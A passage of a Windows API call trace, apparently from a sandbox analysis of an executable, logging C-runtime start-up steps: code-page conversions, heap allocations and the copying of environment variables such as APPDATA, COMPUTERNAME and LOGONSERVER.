¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0117.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e7f8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ'\x0eia4ë\x18", lpUsedDefaultChar=0x0) returned 256 [0117.725] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0117.725] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x40636c [0117.772] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0f88) returned 0x80 [0117.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0117.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1f) returned 0x2df190 [0117.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x2df190, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0117.805] GetLastError () returned 0x0 [0117.805] SetLastError (dwErrCode=0x0) [0117.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x2e1238 [0117.805] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1238) returned 0x4 [0117.805] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1238, Size=0x8) returned 0x2e1238 [0117.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0117.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x36) returned 0x2e1248 [0117.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x2e1248, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0117.805] GetLastError () returned 0x0 [0117.805] SetLastError (dwErrCode=0x0) [0117.805] GetLastError () returned 0x0 [0117.805] SetLastError (dwErrCode=0x0) [0117.805] GetLastError () returned 0x0 [0117.805] SetLastError (dwErrCode=0x0) [0117.815] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1238) returned 0x8 [0117.815] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1238, Size=0xc) returned 0x2e1288 [0117.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0117.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x37) returned 0x2e12a0 [0117.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2e12a0, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0117.815] GetLastError () returned 0x0 [0117.815] SetLastError (dwErrCode=0x0) [0117.815] GetLastError () returned 0x0 [0117.815] SetLastError (dwErrCode=0x0) [0117.815] GetLastError () returned 0x0 [0117.815] SetLastError (dwErrCode=0x0) [0117.815] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1288) returned 0xc [0117.816] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1288, Size=0x10) returned 0x2e1288 [0117.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0117.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3c) returned 0x2d5878 [0117.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2d5878, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] GetLastError () returned 0x0 [0117.816] SetLastError (dwErrCode=0x0) [0117.816] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1288) returned 0x10 [0117.817] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1288, Size=0x14) returned 0x2e12e0 [0117.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0117.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x31) returned 0x2e1300 [0117.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2e1300, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] GetLastError () returned 0x0 [0117.817] SetLastError (dwErrCode=0x0) [0117.817] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e12e0) returned 0x14 [0117.818] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e12e0, Size=0x18) returned 0x2e12e0 [0117.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0117.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x17) returned 0x2e1340 [0117.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x2e1340, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0117.818] GetLastError () returned 0x0 [0117.818] SetLastError (dwErrCode=0x0) [0117.818] GetLastError () returned 0x0 [0117.818] SetLastError (dwErrCode=0x0) [0117.818] GetLastError () returned 0x0 [0117.818] SetLastError (dwErrCode=0x0) [0117.818] GetLastError () returned 0x0 [0117.818] SetLastError (dwErrCode=0x0) [0117.818] GetLastError () returned 0x0 [0117.818] SetLastError (dwErrCode=0x0) [0117.818] GetLastError () returned 0x0 [0117.818] SetLastError (dwErrCode=0x0) [0117.818] GetLastError () returned 0x0 [0117.818] SetLastError (dwErrCode=0x0) [0117.818] GetLastError () returned 0x0 [0117.818] SetLastError (dwErrCode=0x0) [0117.818] GetLastError () returned 0x0 [0117.818] SetLastError (dwErrCode=0x0) [0117.819] GetLastError () returned 0x0 [0117.819] SetLastError (dwErrCode=0x0) [0117.819] GetLastError () returned 0x0 [0117.819] SetLastError (dwErrCode=0x0) [0117.819] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e12e0) returned 0x18 [0117.819] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e12e0, Size=0x1c) returned 0x2e1360 [0117.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0117.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2dab00 [0117.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x2dab00, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0117.819] GetLastError () returned 0x0 [0117.819] SetLastError (dwErrCode=0x0) [0117.819] GetLastError () returned 0x0 [0117.819] SetLastError (dwErrCode=0x0) [0117.819] GetLastError () returned 0x0 [0117.819] SetLastError (dwErrCode=0x0) [0117.819] GetLastError () returned 0x0 [0117.819] SetLastError (dwErrCode=0x0) [0117.819] GetLastError () returned 0x0 [0117.819] SetLastError (dwErrCode=0x0) [0117.819] GetLastError () returned 0x0 [0117.819] SetLastError (dwErrCode=0x0) [0117.819] GetLastError () returned 0x0 [0117.819] SetLastError (dwErrCode=0x0) [0117.820] GetLastError () returned 0x0 [0117.820] SetLastError (dwErrCode=0x0) [0117.820] GetLastError () returned 0x0 [0117.820] SetLastError (dwErrCode=0x0) [0117.820] GetLastError () returned 0x0 [0117.820] SetLastError (dwErrCode=0x0) [0117.820] GetLastError () returned 0x0 [0117.820] SetLastError (dwErrCode=0x0) [0117.820] GetLastError () returned 0x0 [0117.820] SetLastError (dwErrCode=0x0) [0117.820] GetLastError () returned 0x0 [0117.820] SetLastError (dwErrCode=0x0) [0117.820] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1360) returned 0x1c [0117.820] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1360, Size=0x20) returned 0x2e1360 [0117.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x14) returned 0x2e12e0 [0117.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x2e12e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0117.820] GetLastError () returned 0x0 [0117.820] SetLastError (dwErrCode=0x0) [0117.820] GetLastError () returned 0x0 [0117.820] SetLastError (dwErrCode=0x0) [0117.820] GetLastError () returned 0x0 [0117.820] SetLastError (dwErrCode=0x0) [0117.820] GetLastError () returned 0x0 [0117.821] SetLastError (dwErrCode=0x0) [0117.821] GetLastError () returned 0x0 [0117.821] SetLastError (dwErrCode=0x0) [0117.821] GetLastError () returned 0x0 [0117.821] SetLastError (dwErrCode=0x0) [0117.821] GetLastError () returned 0x0 [0117.821] SetLastError (dwErrCode=0x0) [0117.821] GetLastError () returned 0x0 [0117.821] SetLastError (dwErrCode=0x0) [0117.821] GetLastError () returned 0x0 [0117.821] SetLastError (dwErrCode=0x0) [0117.821] GetLastError () returned 0x0 [0117.821] SetLastError (dwErrCode=0x0) [0117.821] GetLastError () returned 0x0 [0117.821] SetLastError (dwErrCode=0x0) [0117.821] GetLastError () returned 0x0 [0117.821] SetLastError (dwErrCode=0x0) [0117.821] GetLastError () returned 0x0 [0117.821] SetLastError (dwErrCode=0x0) [0117.821] GetLastError () returned 0x0 [0117.821] SetLastError (dwErrCode=0x0) [0117.821] GetLastError () returned 0x0 [0117.822] SetLastError (dwErrCode=0x0) [0117.822] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1360) returned 0x20 [0117.822] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1360, Size=0x24) returned 0x2e1360 [0117.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0117.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd) returned 0x2de768 [0117.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x2de768, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0117.822] GetLastError () returned 0x0 [0117.822] SetLastError (dwErrCode=0x0) [0117.822] GetLastError () returned 0x0 [0117.822] SetLastError (dwErrCode=0x0) [0117.822] GetLastError () returned 0x0 [0117.822] SetLastError (dwErrCode=0x0) [0117.822] GetLastError () returned 0x0 [0117.822] SetLastError (dwErrCode=0x0) [0117.822] GetLastError () returned 0x0 [0117.822] SetLastError (dwErrCode=0x0) [0117.822] GetLastError () returned 0x0 [0117.822] SetLastError (dwErrCode=0x0) [0117.822] GetLastError () returned 0x0 [0117.822] SetLastError (dwErrCode=0x0) [0117.822] GetLastError () returned 0x0 [0117.822] SetLastError (dwErrCode=0x0) [0117.823] GetLastError () returned 0x0 [0117.823] SetLastError (dwErrCode=0x0) [0117.823] GetLastError () returned 0x0 [0117.823] SetLastError (dwErrCode=0x0) [0117.823] GetLastError () returned 0x0 [0117.823] SetLastError (dwErrCode=0x0) [0117.823] GetLastError () returned 0x0 [0117.823] SetLastError (dwErrCode=0x0) [0117.823] GetLastError () returned 0x0 [0117.823] SetLastError (dwErrCode=0x0) [0117.823] GetLastError () returned 0x0 [0117.823] SetLastError (dwErrCode=0x0) [0117.823] GetLastError () returned 0x0 [0117.823] SetLastError (dwErrCode=0x0) [0117.823] GetLastError () returned 0x0 [0117.823] SetLastError (dwErrCode=0x0) [0117.823] GetLastError () returned 0x0 [0117.823] SetLastError (dwErrCode=0x0) [0117.823] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1360) returned 0x24 [0117.823] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1360, Size=0x28) returned 0x2e1360 [0117.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0117.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x25) returned 0x2dab30 [0117.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x2dab30, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0117.824] GetLastError () returned 0x0 [0117.824] SetLastError (dwErrCode=0x0) [0117.824] GetLastError () returned 0x0 [0117.824] SetLastError (dwErrCode=0x0) [0117.824] GetLastError () returned 0x0 [0117.824] SetLastError (dwErrCode=0x0) [0117.824] GetLastError () returned 0x0 [0117.824] SetLastError (dwErrCode=0x0) [0117.824] GetLastError () returned 0x0 [0117.824] SetLastError (dwErrCode=0x0) [0117.824] GetLastError () returned 0x0 [0117.824] SetLastError (dwErrCode=0x0) [0117.824] GetLastError () returned 0x0 [0117.824] SetLastError (dwErrCode=0x0) [0117.824] GetLastError () returned 0x0 [0117.824] SetLastError (dwErrCode=0x0) [0117.824] GetLastError () returned 0x0 [0117.824] SetLastError (dwErrCode=0x0) [0117.824] GetLastError () returned 0x0 [0117.824] SetLastError (dwErrCode=0x0) [0117.824] GetLastError () returned 0x0 [0117.824] SetLastError (dwErrCode=0x0) [0117.824] GetLastError () returned 0x0 [0117.825] SetLastError (dwErrCode=0x0) [0117.825] GetLastError () returned 0x0 [0117.825] SetLastError (dwErrCode=0x0) [0117.825] GetLastError () returned 0x0 [0117.825] SetLastError (dwErrCode=0x0) [0117.825] GetLastError () returned 0x0 [0117.825] SetLastError (dwErrCode=0x0) [0117.825] GetLastError () returned 0x0 [0117.825] SetLastError (dwErrCode=0x0) [0117.825] GetLastError () returned 0x0 [0117.825] SetLastError (dwErrCode=0x0) [0117.825] GetLastError () returned 0x0 [0117.825] SetLastError (dwErrCode=0x0) [0117.825] GetLastError () returned 0x0 [0117.825] SetLastError (dwErrCode=0x0) [0117.826] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1360) returned 0x28 [0117.826] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1360, Size=0x2c) returned 0x2e1360 [0117.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0117.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x39) returned 0x2d58c0 [0117.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x2d58c0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0117.826] GetLastError () returned 0x0 [0117.826] SetLastError (dwErrCode=0x0) [0117.826] GetLastError () returned 0x0 [0117.826] SetLastError (dwErrCode=0x0) [0117.826] GetLastError () returned 0x0 [0117.826] SetLastError (dwErrCode=0x0) [0117.826] GetLastError () returned 0x0 [0117.826] SetLastError (dwErrCode=0x0) [0117.826] GetLastError () returned 0x0 [0117.826] SetLastError (dwErrCode=0x0) [0117.826] GetLastError () returned 0x0 [0117.826] SetLastError (dwErrCode=0x0) [0117.826] GetLastError () returned 0x0 [0117.826] SetLastError (dwErrCode=0x0) [0117.826] GetLastError () returned 0x0 [0117.826] SetLastError (dwErrCode=0x0) [0117.826] GetLastError () returned 0x0 [0117.826] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.827] SetLastError (dwErrCode=0x0) [0117.827] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1360) returned 0x2c [0117.828] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1360, Size=0x30) returned 0x2e1360 [0117.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0117.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x18) returned 0x2e1398 [0117.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x2e1398, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.828] SetLastError (dwErrCode=0x0) [0117.828] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.829] SetLastError (dwErrCode=0x0) [0117.829] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] GetLastError () returned 0x0 [0117.830] SetLastError (dwErrCode=0x0) [0117.830] RtlSizeHeap (HeapHandle=0x2c0000, 